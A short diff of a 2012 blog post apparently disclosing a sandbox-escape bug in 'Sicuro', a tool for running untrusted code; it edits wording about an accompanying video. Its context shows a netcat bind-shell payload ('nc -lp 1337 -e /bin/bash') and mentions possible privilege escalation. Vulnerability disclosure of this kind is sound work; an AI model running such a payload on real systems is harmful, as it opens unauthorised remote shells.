Dindows-Systems/duckinator.net/_posts/2012-07-19-sicuro-untrusted-code-execution.markdown

     Libc.system('nc -lp 1337 -e /bin/bash &amp;')

 Congratulations, you now can run `netcat $IP 1337` to connect.
+The IP could easily be gained through similar means.

-There's a video at the bottom, but odds are it's entirely unintelligible, so you can [go directly to the video](/assets/sicuro-untrusted-code-execution-bug.ogv).
+There's a video at the bottom, but it's a bit difficult to read at that scale, so you can [go directly to the video](/assets/sicuro-untrusted-code-execution-bug.ogv).

 It may also be possible to escalate privileges using this.